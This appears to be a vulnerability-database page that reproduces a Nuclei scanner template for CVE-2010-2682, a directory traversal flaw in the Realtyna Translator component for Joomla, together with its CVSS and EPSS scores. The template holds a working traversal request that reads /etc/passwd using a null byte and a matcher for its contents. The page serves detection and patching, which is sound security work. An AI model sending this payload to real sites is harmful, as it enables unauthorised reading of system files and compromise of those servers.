Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2682
HistoryAug 05, 2021 - 11:06 p.m.

Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

2021-08-0523:06:54
ProjectDiscovery
github.com
3
joomla
component
realtyna
translator
local file inclusion
vulnerability
unauthorized access
sensitive files
compromise
upgrade
latest version
mitigation

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.008

Percentile

82.0%

A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2682

info:
  name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/14017
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2682
    - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt
    - http://www.exploit-db.com/exploits/14017
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2682
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.81565
    cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: realtyna
    product: com_realtyna
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,realtyna

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402207d1d2f20ada527079788bebc1f7fb87e930823a6967b86b853d1b2d63ad60cc702203e9f6fa2c9063ccbb1dfe4f610e521bf0f622c6481c4b0cd4d1e44dd4dc57677:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.008

Percentile

82.0%

Related for NUCLEI:CVE-2010-2682